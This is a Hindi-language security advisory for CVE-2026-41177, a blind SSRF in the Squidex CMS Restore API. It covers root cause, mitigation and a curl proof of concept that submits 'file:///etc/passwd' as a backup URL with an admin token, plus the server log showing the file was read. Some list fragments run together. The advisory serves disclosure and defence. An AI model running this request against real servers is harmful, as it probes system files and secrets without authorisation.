
CVE-2026-41177, Squidex CMS (v7.23.0 से पहले) में एक ब्लाइंड SSRF भेद्यता। इसमें मूल कारण विश्लेषण, पुनरुत्पादन चरण, और लोकल फ़ाइल इंटरैक्शन (LFI) के संबंध में प्रभाव आकलन शामिल है।
CVE-2026-41177 के लिए तकनीकी शोध और विश्लेषण: Squidex CMS Restore API में एक ब्लाइंड सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता।
/api/apps/restore)Squidex Restore API ब्लाइंड सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) के प्रति संवेदनशील है। एप्लिकेशन उपयोगकर्ता द्वारा प्रदान किए गए Url पैरामीटर के URI स्कीम को सत्यापित करने में विफल रहता है, जिससे file:// प्रोटोकॉल का उपयोग संभव हो जाता है। यह एक प्रमाणित व्यवस्थापक को बैकएंड सर्वर को लोकल फाइलसिस्टम के साथ इंटरैक्ट करने के लिए मजबूर करने की अनुमति देता है, जिससे लोकल फाइल इंटरैक्शन (LFI) और आंतरिक लॉग के साइड-चैनल विश्लेषण के माध्यम से संवेदनशील सिस्टम जानकारी का संभावित प्रकटीकरण होता है।
file:///etc/passwdRestoreJob) को पास करता है।204 No Content है, आंतरिक सर्वर लॉग से पता चलता है कि सर्वर ने फ़ाइल को सफलतापूर्वक खोला और पढ़ा, इससे पहले कि सामग्री मान्य ZIP संग्रह न होने के कारण विफल हो जाती।निम्नलिखित curl कमांड चलाएँ (<TOKEN> को एक मान्य व्यवस्थापक टोकन से बदलें):
curl -X POST http://localhost/api/apps/restore/ \
-H 'Authorization: Bearer <TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"Url": "file:///etc/passwd",
"Name": "exploit-poc"
}' -v
Squidex कंटेनर लॉग में निम्नलिखित त्रुटि आंतरिक फ़ाइल इंटरैक्शन की पुष्टि करती है:
{
"logLevel": "Error",
"message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
"exception": {
"type": "System.IO.InvalidDataException",
"message": "End of Central Directory record could not be found.",
"stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
}
}
नोट: InvalidDataException पुष्टि करता है कि सर्वर ने फ़ाइल के बाइट्स को सफलतापूर्वक एक्सेस और पढ़ा।
यह भेद्यता प्रमाणित हमलावरों को अनुमति देती है:
appsettings.json, सीक्रेट्स) की उपस्थिति की पुष्टि करें।http:// और https:// स्कीम को सख्ती से अनुमति दें।file:// स्कीम का उपयोग करने वाले किसी भी URI को अस्वीकार करने के लिए एक जाँच लागू करें।